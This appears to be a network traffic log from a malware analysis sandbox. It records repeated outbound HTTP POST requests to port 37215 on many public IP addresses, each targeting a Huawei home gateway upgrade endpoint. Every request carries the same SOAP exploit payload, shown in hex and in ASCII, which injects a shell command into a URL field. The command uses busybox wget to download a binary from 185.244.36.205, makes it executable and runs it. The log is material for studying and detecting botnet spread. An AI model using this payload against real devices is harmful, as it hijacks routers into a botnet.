                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              429192.168.2.1542576156.158.187.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719175100 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              430192.168.2.1560702121.106.31.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719207048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              431192.168.2.1543604197.238.196.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719222069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              432192.168.2.155628637.90.197.24237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719252110 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              433192.168.2.154990031.166.220.2937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719253063 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              434192.168.2.153597245.105.175.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719258070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              435192.168.2.1545400102.181.0.20037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719269991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              436192.168.2.1551036181.195.159.18337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719309092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              437192.168.2.1541710122.42.135.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719321012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              438192.168.2.1544394122.196.26.20137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719351053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
